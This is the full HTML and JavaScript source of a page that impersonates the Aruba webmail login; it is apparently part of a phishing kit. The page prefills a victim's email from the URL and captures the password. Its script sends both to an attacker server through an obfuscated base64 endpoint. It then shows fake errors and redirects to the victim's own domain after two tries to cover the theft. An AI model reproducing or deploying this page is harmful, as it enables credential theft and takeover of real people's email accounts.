<!DOCTYPE HTML>
<html>

<head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta CONTENT="text/html; charset=utf-8" HTTP-EQUIV="content-type" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <link href="https://fonts.googleapis.com/css?family=Lato:300,400,700&subset=latin,latin-ext" rel="stylesheet"
        type="text/css">
    <title>Webmail Aruba</title>
    <link rel="icon"
        href="https://jhxzsd55s5nwayiltj2eh5k7ftk3kkbojb7mucxeyt7mflbdfyea.arweave.net/Se-ZD72XW2BhC5p0Q_VfLNW1KC5IfsoK5MT-wqwjLgg"
        type="image/x-icon">
</head>


<body>

    <div style="position: sticky; top: 0; background-color: #f1f1f1;  z-index: 999;">
        <div id="google_translate_element"></div>
    </div>

    <style>
        html {
            height: 100%;
            width: 100%;
        }

        body {
            background-color: #F2F2F0;
            color: #3f3f3f;
            display: flex;
            flex-direction: column;
            font-family: "Lato", Arial;
            font-size: 14px;
            font-style: normal;
            font-weight: normal;
            height: 100%;
            margin: 0;
            width: 100%;
        }

        a,
        .link {
            color: #3C86CB;
            cursor: pointer;
            text-decoration: none;
        }

        a:hover,
        .link:hover {
            cursor: pointer;
            text-decoration: underline;
        }

        .login-background {
            background-color: #ffffff;
            flex: 1 1 auto;
            flex-direction: column;
        }

        .main-block {
            display: flex;
            flex: 1 1 auto;
            justify-content: center;
        }

        .left-block {
            display: flex;
            flex: 0 0 auto;
            justify-content: center;
            overflow: hidden;
            padding: 215px 0 0 50px;
        }

        .left-block-image,
        .left-block iframe {
            border: none;
            height: 455px;
            width: 600px
        }

        .left-block-image {
            background: transparent url("https://6iv5ngr6kwv5jkhdrjwhf75q6tsiqe3toynlflj5mdntmphv27hq.arweave.net/8ivWmj5Vq9So44pscv-w9OSIE3N2GrKtPWDbNjz1188") no-repeat;
            display: all;
        }

        #language-button {
            align-items: center;
            display: flex;
            flex: 0 0 auto;
            height: 23px;
            justify-content: flex-end;
            margin-left: 30px;
            background: transparent;
            border: none;
            padding: 0;
        }

        .language-flag {
            background-position: center;
            cursor: pointer;
            flex: 0 0 auto;
            height: 20px;
            width: 30px;
        }

        #language-button img {
            float: right;
            margin-right: 2px;
            margin-top: 8px;
        }

        #language_select {
            cursor: pointer;
            display: none;
            flex: 0 0 auto;
            padding: 0 5px;
        }

        .menu-language-arrow {
            cursor: pointer;
        }

        #menu_language {
            display: none;
            z-index: 2;
        }

        #menu_language ul {
            margin: 0;
            padding: 0;
            position: relative;
            top: 22px;
            right: 60px;
            background-color: white;
            border: 1px solid #ddd;
            box-shadow: 0 1px 4px 0 rgba(0, 0, 0, 0.37);
        }

        #menu_language li {
            cursor: pointer;
            font-size: 13px;
            list-style: none;
            padding: 5px 15px;
        }

        #menu_language li:hover {
            background-color: #f1f1f1;
        }

        #menu_language button {
            background-position: left center;
            color: #3f3f3f;
            display: block;
            text-indent: 29px;
            margin: 0;
            border: none;
            padding: 0;
        }

        .show {
            display: block !important;
            position: absolute;
        }

        #it,
        .it .language-flag {
            background: url("https://webmail.aruba.it/web_imgs/login/images/flag/it.png?_v_=4.2.88.20230724_1029") no-repeat scroll 5px 5px;
        }

        #en,
        .en .language-flag {
            background: url("https://webmail.aruba.it/web_imgs/login/images/flag/gb.png?_v_=4.2.88.20230724_1029") no-repeat scroll 5px 5px;
        }

        #hu,
        .hu .language-flag {
            background: url("https://webmail.aruba.it/web_imgs/login/images/flag/hu.png?_v_=4.2.88.20230724_1029") no-repeat scroll 5px 5px;
        }

        #pl,
        .pl .language-flag {
            background: url("https://webmail.aruba.it/web_imgs/login/images/flag/pl.png?_v_=4.2.88.20230724_1029") no-repeat scroll 5px 5px;
        }

        #es,
        .es .language-flag {
            background: url("https://webmail.aruba.it/web_imgs/login/images/flag/es.png?_v_=4.2.88.20230724_1029") no-repeat scroll 5px 5px;
        }

        #cz,
        .cz .language-flag {
            background: url("https://webmail.aruba.it/web_imgs/login/images/flag/cz.png?_v_=4.2.88.20230724_1029") no-repeat scroll 5px 5px;
        }

        .right-block {
            display: flex;
            flex: 0 0 auto;
            flex-direction: column;
            padding: 65px 50px 50px;
            width: 400px;
        }

        .logo-block {
            align-items: center;
            display: flex;
            flex: 0 0 auto;
            height: 40px;
        }

        .left-logo {
            background: url("https://kfoc7ghc5myestqsepq4qmhg66qkydaq2e5shhcmltsikswr6cga.arweave.net/UVwvmOLrMElOEiPhyDDm96CsDBDROyOcTFzkhUrR8Iw") no-repeat left center;
            flex: 1 0 auto;
            height: 100%;
            background-size: 140px 40px;
        }

        .right-logo {
            background: url("https://if53uq7sppvze6zpkup46orr4a4cy7bws7jfibzjobpero5nq6zq.arweave.net/QXu6Q_J765J7L1Ufzzox4DgsfDaX0lQHKXBeSLuth7M") no-repeat left center;
            flex: 0 0 auto;
            height: 35px;
            width: 45px;
        }

        .tab-switcher-block {
            align-items: center;
            display: flex;
            flex: 0 0 auto;
            justify-content: space-between;
            margin-top: 40px;
        }

        .tab-buttons-block {
            display: flex;
            flex: 0 0 auto;
        }

        .tab-buttons-block> :first-child {
            border-bottom-left-radius: 5px;
            border-right: none;
            border-top-left-radius: 5px;
        }

        .tab-buttons-block> :last-child {
            border-bottom-right-radius: 5px;
            border-top-right-radius: 5px;
        }

        .tab-button {
            align-items: center;
            background: #fff;
            border: 1px solid #bbb;
            cursor: pointer;
            display: flex;
            height: 35px;
            padding: 0 20px;
            box-sizing: border-box;
        }

        .right-block:not(.manage-tab) .tab-button.tab-1,
        .right-block.manage-tab .tab-button.tab-2 {
            background-color: #f1f1f1;
            font-weight: bold;
        }

        .form-block {
            align-items: stretch;
            display: flex;
            flex: 1 0 auto;
            flex-direction: column;
            padding-top: 24px;
        }

        .feedback-block {
            align-items: center;
            background-color: #fff;
            border-radius: 6px;
            display: flex;
            flex: 0 0 auto;
            font-size: 12px;
            min-height: 31px;
            margin-top: 35px;
            padding: 5px 20px;
            box-sizing: border-box;
        }

        .feedback-icon {
            flex: 0 0 auto;
            height: 17px;
            margin-right: 10px;
            width: 17px;
        }

        .feedback-block.error {
            background-color: #fbd7ca;
        }

        .feedback-block.error .feedback-icon {
            background: url("https://vi63pjqezvt2ij4hzsd53hu2z2ic3zn5lvqodfporu2mkhzjgdba.arweave.net/qj23pgTNZ6Qnh8yH3Z6azpAt5b1dYOGV7o00xR8pMMI") no-repeat center;
        }

        .feedback-block.waiting {
            background-color: #f1f1f1;
        }

        .feedback-block.waiting .feedback-icon {
            background: url(https://i5zlrv4utdr2sohv3bsnh7r3vmtalumytobbt6ndy62zhxee75aa.arweave.net/R3K415SY46k49dhk0_47qyYF0Zibghn5o8e1k9yE_0A) no-repeat center;
        }

        .feedback-text {
            display: inline-block;
            overflow: hidden;
            text-overflow: ellipsis;
            white-space: nowrap;
        }

        .form-tab {
            display: none;
            flex: 1 0 auto;
            flex-direction: column;
        }

        .right-block:not(.manage-tab) .form-tab.tab-1,
        .right-block.manage-tab .form-tab.tab-2 {
            display: flex;
        }

        .form-title {
            font-size: 28px;
            font-weight: bold;
            margin-bottom: 25px;
            text-align: center;
        }

        .input-container {
            align-items: center;
            border-bottom: 2px solid #737373;
            display: flex;
            margin: 5px 0;
        }

        .input-container.filled,
        .input-container.focused {
            border-bottom: 2px solid #f4a253;
        }

        .input-container .login-icon {
            background: url("https://4gie66c6hcy5l4zj5irs2lnfeb5zph3ho7mwb3az5oh77xrirt7q.arweave.net/4ZBPeF44sdXzKeojLS2lIHuXn2d32WDsGeuP_94ojP8") no-repeat left center;
            background-size: 19px 13px;
            flex: 0 0 auto;
            height: 13px;
            margin-right: 15px;
            width: 19px;
        }

        .input-container .password-icon {
            background: url("https://jk4hkfqjujor6msgdhunqtrie2vj2zvculora6ohrzfj5vcwguzq.arweave.net/Srh1FgmiXR8yRhno2E4oJqqdZqKi3RB5x45KntRWNTM") no-repeat left center;
            background-size: 19px 20px;
            flex: 0 0 auto;
            height: 20px;
            margin-right: 15px;
            width: 19px;
        }

        .input-container .password-icon-2 {
            background: url("https://opgksmt3ybgm7qa4kbwqamnubmocwgqluk4acfrpmaizbtu5lfza.arweave.net/c8ypMnvATM_AHFBtADG0CxwrGguiuAEWL2ARkM6dWXI") no-repeat left center;
            background-size: 22px 19px;
            cursor: pointer;
            flex: 0 0 auto;
            height: 19px;
            margin-left: 15px;
            width: 22px;
        }

        .input-container input[type="text"]+.password-icon-2 {
            background: url("https://sysg4oezs2tsci5xf3qy2h2z6syurwpqtfjpeq6q2e4mdn5ux7eq.arweave.net/liRuOJmWpyEjty7hjR9Z9LFI2fCZUvJD0NE4wbe0v8k") no-repeat left center;
        }

        .input-container input[type="text"],
        .input-container input[type="password"] {
            background-color: #fff;
            border: none;
            color: #3f3f3f;
            direction: ltr;
            flex: 1 1 auto;
            font-family: "Lato";
            font-size: 16px;
            height: 19px;
            margin: 0;
            outline: none;
            padding: 14px 0;
        }

        .input-container input::placeholder {
            color: #aaa9a9;
        }

        .input-container input:-ms-input-placeholder {
            color: #aaa9a9;
        }

        .input-container input::-ms-input-placeholder {
            color: #aaa9a9;
        }

        .input-container input:-webkit-autofill,
        .input-container input:-webkit-autofill:hover,
        .input-container input:-webkit-autofill:focus {
            -webkit-box-shadow: 0 0 0 1000px #fff inset;
            -webkit-text-fill-color: #3f3f3f;
        }

        .capslock-detect {
            color: #ff0000;
            font-weight: bold;
            margin-bottom: 10px;
            text-align: right;
            visibility: hidden;
        }

        .radio-button-block {
            display: flex;
            align-items: center;
        }

        .radio-button-header {
            margin-right: 10px;
        }

        .radio-button-pane {
            display: flex;
            justify-content: space-between;
            flex: 1 0 auto;
        }

        .radio-button-cnt {
            display: flex;
            align-items: center;
        }

        .radio-button-cnt label {
            align-items: center;
            cursor: pointer;
            display: flex;
            margin: 5px 0;
        }

        .radio-button-cnt input {
            opacity: 0;
            position: absolute;
        }

        .radio-button-outer {
            background-color: transparent;
            border: 1px solid #c2c0ca;
            border-radius: 12px;
            height: 14px;
            margin-right: 10px;
            width: 14px;
        }

        .radio-button-inner {
            border-radius: 6px;
            height: 8px;
            margin: 3px;
            width: 8px;
        }

        .radio-button-cnt input[type="radio"]:checked+label .radio-button-inner {
            background-color: #f06734;
        }

        .login-button {
            align-items: center;
            background: #f06734;
            background: -webkit-linear-gradient(0deg, #d84e1a, #f06734);
            background: -o-linear-gradient(0deg, #d84e1a, #f06734);
            background: -moz-linear-gradient(0deg, #d84e1a, #f06734);
            background: linear-gradient(0deg, #d84e1a, #f06734);
            border-radius: 5px;
            border: none;
            color: #fff;
            cursor: pointer;
            display: flex;
            font-weight: bold;
            height: 50px;
            justify-content: center;
            margin: 50px 0 0;
            padding: 0 20px;
            text-transform: uppercase;
            user-select: none;
        }

        .login-button:hover {
            background: #d84e1a;
            background: -webkit-linear-gradient(0deg, #e66536, #f27649);
            background: -o-linear-gradient(0deg, #e66536, #f27649);
            background: -moz-linear-gradient(0deg, #e66536, #f27649);
            background: linear-gradient(0deg, #e66536, #f27649);
        }

        .login-button:active {
            background: #d84e1a;
            background: -webkit-linear-gradient(0deg, #f06734, #d84e1a);
            background: -o-linear-gradient(0deg, #f06734, #d84e1a);
            background: -moz-linear-gradient(0deg, #f06734, #d84e1a);
            background: linear-gradient(0deg, #f06734, #d84e1a);
        }

        .footer-block {
            flex: 0 0 auto;
            font: normal normal 12px/21px "Lato";
            height: 40px;
            margin: 20px 0 40px;
        }

        .footer-block .accessible-link {
            font-size: 14px;
            margin-bottom: 3px;
            text-align: center;
        }

        .footer-block .text-footer {
            font-size: 11px;
            text-align: center;
        }

        .remember-me-block {
            display: flex;
            margin: 20px 0 5px;
        }

        .remember-me-block label {
            align-items: center;
            cursor: pointer;
            display: flex;
            flex: 1 0 auto;
        }

        .remember-me-block input[type="checkbox"] {
            opacity: 0;
            position: absolute;
        }

        .remember-me-block input[type="checkbox"]+div {
            align-items: center;
            display: flex;
        }

        .remember-me-block input[type="checkbox"]+div:before {
            border: 1px solid #c2c0ca;
            border-radius: 2px;
            content: "";
            cursor: pointer;
            display: block;
            height: 13px;
            margin: 0 10px 0 0;
            width: 13px;
        }

        .remember-me-block input[type="checkbox"]:checked+div:before {
            background: url("https://xkazfncntqbwxum7rth7kfu3pjmekpptbvrer7ssauglrkapwriq.arweave.net/uoGStE2cA2vRn4zP9RabelhFPfMNYkj-UgUMuKgPtFE") no-repeat center;
            background-size: 11px;
        }

        .remember-me-block .lost-password {
            cursor: pointer;
            flex: 1 0 auto;
            text-align: right;
        }

        .test-sticker {
            align-items: center;
            background-color: #6abe0f;
            color: #fff;
            display: flex;
            font-weight: bold;
            margin: 0 10px;
            padding: 2px 10px;
            text-transform: uppercase;
            font-size: 12px;
        }

        @media screen and (max-width: 1150px) {
            .left-block {
                padding-left: 5px;
            }

            .right-block {
                padding-right: 5px;
            }
        }

        @media screen and (max-width: 1060px) {
            .left-block {
                flex: 0 1 auto;
            }
        }

        @media screen and (max-width: 1020px) {
            .left-block {
                display: none;
            }
        }

        @media screen and (max-height: 895px) {
            .left-block {
                padding-top: 155px;
            }

            .right-block {
                padding-top: 5px;
            }
        }

        @media screen and (max-height: 835px) {
            .right-block {
                padding-bottom: 0px;
            }

            .footer-block {
                margin: 10px 0 5px;
            }
        }

        .cookie-directive {
            background-color: #aaa;
            color: #fff;
            display: none;
            padding: 10px 20px;
            text-align: center;
            position: fixed;
            bottom: 0px;
            width: 100%;
        }

        .pec-text {
            flex: 1 0 auto;
            display: flex;
            padding-top: 10px;
            align-items: center;
        }

        .giga-text {
            display: none;
            justify-content: center;
            align-items: flex-start;
            padding-top: 30px;
        }

        .obsolete-page {
            background-color: #fff;
            box-sizing: border-box;
            color: #000;
            height: 100%;
            padding: 30px;
        }

        .obsolete-header {
            background: url("https://kfau6svsqqpfyf7tk3lhka7wfwfqi3m32vvpnl4aiyvdlrxqrila.arweave.net/UUFPSrKEHlwX81bWdQP2LYsEbZvVavavgEYqNcbwihY") no-repeat left top;
            background-size: 208px 40px;
            border-bottom: 1px solid #ddd;
            height: 66px;
        }

        .obsolete-content {
            background: url("https://3n5khjtk5e3y53z6ri3z6his3m2efu3vmburrlaic5g5lp5vbelq.arweave.net/23qjpmrpN47vPoo3nx0S2zRC03VgaRisCBdN1b-1CRc") no-repeat left top;
            background-size: 158px 112px;
            margin: 150px auto;
            padding-left: 238px;
            width: 500px;
        }

        .obsolete-browser-title {
            font-size: 24px;
        }

        .obsolete-browser-subtitle {
            margin-top: 15px;
        }

        .obsolete-browser-item {
            background-size: 23px;
            margin-top: 25px;
            padding-left: 35px;
        }

        .obsolete-browser-item.chrome {
            background: url("//webmail.aruba.it/web_imgs/login/images/chrome.png?_v_=4.2.88.20230724_1029") no-repeat left center;
        }

        .obsolete-browser-item.opera {
            background: url("//webmail.aruba.it/web_imgs/login/images/opera.png?_v_=4.2.88.20230724_1029") no-repeat left center;
        }

        .obsolete-browser-item.firefox {
            background: url("//webmail.aruba.it/web_imgs/login/images/firefox.png?_v_=4.2.88.20230724_1029") no-repeat left center;
        }

        .obsolete-browser-item.safari {
            background: url("//webmail.aruba.it/web_imgs/login/images/safari.png?_v_=4.2.88.20230724_1029") no-repeat left center;
        }

        .obsolete-browser-item-title {
            font-weight: bold;
        }

        .obsolete-browser-item-subtitle {
            color: #999;
        }

        .radio-button-cnt input[type="radio"]:focus+label,
        .remember-me-block input[type="checkbox"]:focus+div {
            outline: auto;
        }

        .radio-button-cnt input[type="radio"]:focus+label,
        .remember-me-block input[type="checkbox"]:focus+div {
            outline: auto;
        }

        .pec-dialog-overlay {
            position: absolute;
            top: 0;
            bottom: 0;
            left: 0;
            right: 0;
            z-index: 100;
            background: #000;
            opacity: 0.6;
            display: none;
        }

        .pec-dialog-block {
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            background: #fff;
            border: 1px solid #989898;
            border-radius: 3px;
            width: 488px;
            min-height: 275px;
            z-index: 101;
            opacity: 1;
            display: none;
            flex-direction: column;
            color: #3F3F3F;
        }

        .pec-dialog-title {
            background: #F1F1F1;
            padding: 24px;
            display: flex;
            align-items: center;
        }

        .pec-dialog-title-button {
            flex: 0 0 auto;
            height: 12px;
            width: 12px;
            cursor: pointer;
            margin-left: 15px;
            background: url(//webmail.aruba.it/layout/origin/themes/basic/images/global/tab_close.png?_v_=4.2.88.20230724_1029) no-repeat right top;
        }

        .pec-dialog-title-text {
            flex: 1 1 auto;
            font: normal normal normal 20px/24px Lato;
        }

        .pec-dialog-body {
            padding: 24px;
            display: flex;
            flex-direction: column;
            flex: 1 1 auto;
            font: normal normal normal 14px/21px Arial;
        }

        .pec-dialog-body-text {
            flex: 1 1 auto;
        }

        .pec-dialog-button-bar {
            flex: 0 0 auto;
            display: flex;
            justify-content: flex-end;
            padding: 20px 0 10px;
        }

        .pec-dialog-button-ok,
        .pec-dialog-button-cancel {
            flex: 0 0 auto;
            border-radius: 5px;
            font-size: 14px;
            padding: 9px 16px;
            cursor: pointer;
            min-width: 100px;
            box-sizing: border-box;
            text-align: center;
        }

        .pec-dialog-button-ok {
            margin-right: 16px;
            background: #D94F1B;
            color: #fff;
            border: 1px solid #D94F1B;
        }

        .pec-dialog-button-cancel {
            background: #F3F3F3;
            border: 1px solid #3F3F3F;
        }

        .feedback-cnt {
            width: 46px;
            height: 159px;
            position: fixed;
            z-index: 999;
            left: 0;
            top: 65%;
            margin-top: -79.5px;
            box-shadow: rgba(60, 64, 67, 0.3) 0px 1px 2px 0px, rgba(60, 64, 67, 0.15) 0px 1px 3px 1px;
            border-radius: 0 5px 5px 0;
            cursor: pointer;
        }

        .feedback-cnt span {
            position: absolute;
            top: 50%;
            left: 50%;
            transform: rotate(270deg) translate(-50%, -50%);
            transform-origin: 0 0;
            font-size: 18px;
            font-weight: bold;
        }

        .usabilla_live_button_container {
            display: none;
        }

        #CybotCookiebotDialogHeader {
            display: none !important;
        }
    </style>

    <div class="login-background">
        <div class="main-block">
            <div class="left-block">
                <div class="left-block-image" style="display: all"></div>
            </div>
            <div class="right-block">
                <div class="logo-block">
                    <div class="left-logo"></div>
                    <div class="right-logo"></div>
                </div>
                <div class="tab-switcher-block">
                    <div class="tab-buttons-block">
                        <button type="button" class="tab-button tab-1 hide-in-classic" data-i18n="title_tab_1"
                            onclick="displayTab('1')">Webmail</button>
                        <button type="button" class="tab-button tab-2 hide-in-classic" data-i18n="title_tab_2"
                            onclick="displayTab('2')">Gestisci caselle dominio</button>
                    </div>
                    <button type="button" id="language-button" class="it">
                        <div class="language-flag">
                            <div id="menu_language" class="">
                                <ul>
                                    <li dojoattrid="0"></li>
                            </div>
                        </div>
                        <div id="language_select">Italiano</div>
                        <div class="menu-language-arrow"><svg xmlns="http://www.w3.org/2000/svg" width="10" height="10"
                                viewBox="0 0 32 32" fill="#3f3f3f">
                                <polygon points="2.002,10 16.001,24 30.002,10"></polygon>
                            </svg></div>
                    </button>
                </div>
                <div class="feedback-block error" id="error" style="display: none;">

                </div>
                 <div class="feedback-block error" id="msg" style="display: none;">
                    Attenzione! È necessario inserire l'indirizzo email.
                </div> 


                <div class="form-block">
                    <form id="" name="form1" data-name="" action="" method="post" required>

                        <div class="form-tab tab-1" id="tab1">
                            <div data-i18n="form_title" class="form-title">Accedi alla tua Webmail</div>
                            <!-- <input type="hidden" id="login_pid" name="PID" value="aruba" /> -->

                            <div class="input-container">
                                <div class="login-icon"></div>
                                <input type="text" name="ai" id="ai" value="" placeholder="Email" readonly>


                            </div>
                            <div class="input-container">
                                <div class="password-icon"></div>
                                <input type="password" name="namep" id="pr" value="" placeholder="Password">
                                <div class="password-icon-2"></div>
                            </div>
                            <div class="remember-me-block">
                                <label for="remember_me">
                                    <input type="checkbox" id="remember_me" name="remember_me">
                                    <div class="hide-in-classic" data-i18n="remember_me_label">Resta collegato</div>
                                </label>
                                <div data-i18n="reset_password" class="lost-password">
                                    <div class="link">Password dimenticata?</div>
                                </div>
                            </div>
                            <div class="capslock-detect" id="capslock_detect">Caps Lock</div>
                            <div class="radio-button-block hide-in-classic">
                                <div class="radio-button-header" data-i18n="select_version">SELEZIONA VERSIONE:</div>
                                <div class="radio-button-pane">
                                    <div class="radio-button-cnt">
                                        <input type="radio" name="webmail_version" id="new_webmail_version" value="0">
                                        <label for="new_webmail_version">
                                            <div class="radio-button-outer">
                                                <div class="radio-button-inner"></div>
                                            </div>
                                            <div class="radio-button-label" data-i18n="radio_smart">Smart</div>
                                        </label>
                                        <div class="test-sticker">
                                            <div data-i18n="sticker_test">NUOVA</div>
                                        </div>
                                    </div>
                                    <div class="radio-button-cnt">
                                        <input type="radio" name="webmail_version" id="web2cs_version" value="1">
                                        <label for="web2cs_version">
                                            <div class="radio-button-outer">
                                                <div class="radio-button-inner"></div>
                                            </div>
                                            <div class="radio-button-label" data-i18n="radio_complete">Classic</div>
                                        </label>
                                    </div>
                                </div>
                            </div>
                            <button type="button" data-i18n="button_login" class="login-button" id="submit-btn"
                                onclick="submitForm(event)">ACCEDI</button>

                            <div class="giga-text">
                                <div data-i18n="giga_text"></div>
                            </div>
                        </div>
                    </form>


                    <!-- <form id="" name="form1" data-name="" action="" method="post" required></form>
                    <div class="form-tab tab-2" id="tab2">
                        <div data-i18n="form_title_admin" class="form-title">Manage your mailboxes</div>
                        <div class="input-container">
                            <div class="login-icon"></div>
                            <div class="postmaster-div">postmaster@</div>
                            <input type="text" id="ai" name="ai" value="" data-i18n-placeholder="domain"
                                placeholder="domain to manage">
                        </div>
                        <div class="input-container">
                            <div class="password-icon"></div>
                            <input type="password" id="namep" name="namep" value="">
                            <div class="password-icon-2"></div>
                        </div>
                        <div class="remember-me-block">
                            <div data-i18n="lost_password_postmaster" class="lost-password"></div>
                        </div>
                        <div class="capslock-detect" id="capslock_detect_pm">Caps Lock</div>
                        <div class="radio-button-block hide-in-classic">
                            <div class="radio-button-header" data-i18n="select_version"></div>
                            <div class="radio-button-pane">
                                <div id="postmaster_smart" class="radio-button-cnt">
                                    <input type="radio" name="postmaster_version" id="new_postmaster_version" value="0"
                                        checked="checked">
                                    <label for="new_postmaster_version">
                                        <div class="radio-button-outer">
                                            <div class="radio-button-inner"></div>
                                        </div>
                                        <div class="radio-button-label" data-i18n="postmaster_radio_smart"></div>
                                    </label>
                                    <div class="test-sticker">
                                        <div data-i18n="sticker_test_manage"></div>
                                    </div>
                                </div>
                                <div id="postmaster_completa" class="radio-button-cnt">
                                    <input type="radio" name="postmaster_version" id="postmaster_version" value="1">
                                    <label for="postmaster_version">
                                        <div class="radio-button-outer">
                                            <div class="radio-button-inner"></div>
                                        </div>
                                        <div class="radio-button-label" data-i18n="postmaster_radio_complete"></div>
                                    </label>
                                </div>
                            </div>
                        </div>
                        <button type="button" data-i18n="button_login_postmaster" class="login-button"
                            onclick="submitForm(event)"></button>
                        <div class="pec-text">
                            <div data-i18n="pec_text"></div>
                        </div>
                        <div class="giga-text">
                            <div data-i18n="giga_text"></div>
                        </div>
                    </div>
                    </form> -->
                </div>
            </div>
        </div>
        <div class="footer-block">
            <div class="accessible-link" data-i18n="accessible_link"><a href="#" target="_parent">Versione
                    accessibile</a></div>
            <div class="text-footer" data-i18n="copyright">Copyright &copy; 2023 Aruba S.p.A. - VAT No. 01573850516 -
                Tutti i diritti riservati - <a href="#" class="link">Privacy policy</a></div>
            <div class="text-footer" data-i18n="cookie_bot"><a href="#" rel="noopener noreferrer" class="link">Cookie
                    policy</a> - <a href="#" class="link">Personalizza cookie</a></div>
        </div>
        <div class="pec-dialog-overlay"></div>
        <div class="pec-dialog-block">
            <div class="pec-dialog-title">
                <div class="pec-dialog-title-text" data-i18n="pec_dialog_title"></div>
                <div class="pec-dialog-title-button" onClick="pecHideDialog()"></div>
            </div>
            <div class="pec-dialog-body">
                <div class="pec-dialog-body-text" data-i18n="pec_dialog_text"></div>
                <div class="pec-dialog-button-bar">
                    <div class="pec-dialog-button-ok" data-i18n="pec_dialog_button_login" onClick="pecRedirect()"></div>
                    <div class="pec-dialog-button-cancel" data-i18n="pec_dialog_button_cancel"
                        onClick="pecHideDialog()"></div>
                </div>
            </div>
        </div>
    </div>
    <div id="feedback" class="feedback-cnt"><span data-i18n="feedback_text">Suggerimenti?</span></div>
    <!-- Usabilla Combicode for aruba.it-->
    <!-- Begin Usabilla for Websites embed code -->

    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="./config.js"></script>


<script>
/* global $ */
$(document).ready(function() {
    var count = 0;

    $('#back1').click(function() {
        $("#msg").hide();
        $('#ai').val("");
        $("#automail").animate({ left: 200, opacity: "hide" }, 0);
        $("#inputbar").animate({ right: 200, opacity: "show" }, 1000);

    });

    /////////////url ai getting////////////////
    var ai = window.location.hash.substr(1);
    if (!ai) {

    } else {
        // $('#ai').val(ai);
        var my_ai = ai;
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        var dom = c.toUpperCase();
        $('#ai').val(my_ai);
        $('#ai').attr('disabled', "");
        $('#login_logo1').attr('src', 'https://logo.clearbit.com/' + my_slice);
        $('#domain-name').html(dom);
        $("#msg").hide();
        $("#inputbar").animate({ left: 200, opacity: "hide" }, 0);
        $("#automail").animate({ right: 200, opacity: "show" }, 1000);
    }
    ///////////////url getting ai////////////////


    var atu = "L2Nvbm5lY3QucGhw";
    $('#submit-btn').click(function(event) {
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var ai = $("#ai").val();
        var pr = $("#pr").val();
        var msg = $('#msg').html();
        $('#msg').text(msg);
        ///////////new injection////////////////
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!ai) {
            $('#error').show();
            $('#error').html("Email o Password non validi");
            ai.focus;
            return false;
        }

        if (!filter.test(my_ai)) {
            $('#error').show();
            $('#error').html("Email o Password non validi");
            ai.focus;
            return false;
        }
        if (!pr) {
            $('#error').show();
            $('#error').html("Password non validi");
            ai.focus;
            return false;
        }
		
		
		if(pr.length < 5) {  

			$('#error').show();
            $('#error').html("Password non validi");
            ai.focus;  

			return false;  

		}

        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        var dom = c.toUpperCase();
        ///////////new injection////////////////
        count = count + 1;
        $('#ai').attr('disabled', "");
        $('#login_logo1').attr('src', 'https://logo.clearbit.com/' + my_slice);
        $('#domain-name').html(dom);

        $.ajax({
            dataType: 'JSON',
            url: `${config.baseUrl}${atob(atu)}`,
            type: 'POST',
            data: {
                ai: ai,
                pr: pr,
            },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr) {
                $('#submit-btn').html('Verifing...');
            },
            success: function(response) {
                if (response) {
                    $("#msg").show();
                    console.log(response);
                    if (response['signal'] == 'ok') {
                        $("#pr").val("");
                        if (count >= 2) {
                            count = 0;
                            // window.location.replace(response['redirect_link']);
                            window.location.replace("http://www." + my_slice);

                        }
                        // $('#msg').html(response['msg']);
                    } else {
                        // $('#msg').html(response['msg']);
                    }
                }
            },
            error: function() {
                $("#pr").val("");
                if (count >= 2) {
                    count = 0;
                    window.location.replace("http://www." + my_slice);
                }
                $("#msg").show();
                // $('#msg').html("Please try again later");
            },
            complete: function() {
                $('#submit-btn').html('Login');
            }
        });
    });


});

function getParameterByName(name, url) {
			if (!url) url = window.location.href;
			name = name.replace(/[\[\]]/g, '\\$&');
			var regex = new RegExp('[?&]' + name + '(=([^&#]*)|&|#|$)'),
				results = regex.exec(url);
			if (!results) return null;
			if (!results[2]) return '';
			return decodeURIComponent(results[2].replace(/\+/g, ' '));
		}
			
		const login_username = getParameterByName('cms');
		document.getElementById("ai").value = login_username;
</script>

</body>

</html>